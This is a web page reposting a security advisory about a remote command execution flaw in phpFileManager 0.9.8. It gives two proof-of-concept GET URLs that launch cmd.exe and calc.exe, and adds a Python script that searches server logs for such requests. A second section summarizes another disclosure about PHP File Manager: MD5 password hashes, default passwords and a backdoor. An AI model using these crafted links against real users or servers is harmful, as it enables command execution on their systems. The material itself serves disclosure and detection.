phpFileManager 0.9.8 Remote Command Execution













Description:


phpFileManager is a complete filesystem management tool in a single file. Features: server info, directory tree, copy/move/delete/create/rename/edit/view/chmod files and folders, tar/zip/bzip/gzip, multiple uploads, shell/exec, works on Linux/Windows.




Features


  • server info
  • directory tree
  • copy/move/delete/create/rename/edit/view/chmod files and folders
  • tar/zip/bzip/gzip
  • multiple uploads
  • shell/exec
  • works on linux/windows

Exploits

PHPFileManager is vulnerable to remote command execution and will call operating system commands via GET requests from a victim's browser, triggered by getting the victim to click our malicious link or visit our malicious website.

Exploit code(s):
===============


Remote Command Execution:
-------------------------

1- call Windows cmd.exe

https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe


2- Run Windows calc.exe

https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\calc.exe

 


Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0728.txt
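
For defenders reviewing web server logs, the request pattern in the advisory (a GET to `index.php` with `action=6` and a `cmd` value) can be searched for directly. The script below is an added example, not code from the advisory or from phpFileManager; it assumes Apache/nginx "combined" log format, uses a hypothetical function name `find_cmd_requests`, and runs on constructed sample lines.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access log format (assumed).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

# Constructed sample lines (documentation IPs, placeholder hosts), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:01:02 +0000] '
    '"GET /phpFileManager-0.9.8/index.php?action=6'
    '&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/'
    '&cmd=c%3A%5CWindows%5Csystem32%5Ccalc.exe HTTP/1.1" 200 512 '
    '"https://other-site.example/page.html" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jan/2024:10:05:00 +0000] '
    '"GET /phpFileManager-0.9.8/index.php?action=6&cmd=dir HTTP/1.1" 200 900 '
    '"https://localhost/phpFileManager-0.9.8/index.php" "Mozilla/5.0"',
    '192.0.2.11 - - [01/Jan/2024:10:06:00 +0000] '
    '"GET /phpFileManager-0.9.8/index.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

def find_cmd_requests(lines, site_host):
    """Return one finding per GET request carrying action=6 and a non-empty cmd."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        url = urlsplit(m["target"])
        params = parse_qs(url.query)  # percent-decodes values, drops empty ones
        if params.get("action") != ["6"] or not params.get("cmd"):
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None when Referer is "-"
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "path": url.path,
            "cmd": params["cmd"][0],
            # A Referer on another host suggests a third-party page triggered it.
            "cross_site": ref_host is not None and ref_host != site_host,
        })
    return findings

if __name__ == "__main__":
    for finding in find_cmd_requests(SAMPLE_LOG, "localhost"):
        print(finding)
```

A missing Referer is reported as not cross-site, so findings with `cross_site` false still need review when the shell/exec feature is not in legitimate use.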
 


 
 
 


 

 

PHP File Manager – Multiple Critical Security Vulnerabilities ( Including Backdoor! )

 


According to Sijmen Ruwhof (https://twitter.com/sruwhof), a security consultant and penetration tester based in the Netherlands, some of the issues have been present in the software for the last five years. After three failed attempts to get in touch with Revived Wire Media, the Virginia-based company behind the product, Ruwhof opted on Monday to disclose the issues publicly. See: http://seclists.org/fulldisclosure/2015/Jul/117




“Password hashes stored in the user database are unsalted and are generated via the deprecated MD5 hash algorithm,” Ruwhof said. He explained that an attacker could revert the hashes to their original passwords using an online MD5 reversing service.

The file manager also has a weak password strength policy, a lack of variation in default passwords and measures that don’t force the user to change default passwords. Other flaws include an unsecured backdoor, the ability for users to upload arbitrary and unauthenticated files, and no configuration to restrict file extensions.

Source : http://sijmen.ruwhof.net/weblog/411-multiple-critical-security-vulnerabilities-including-a-backdoor-in-php-file-manager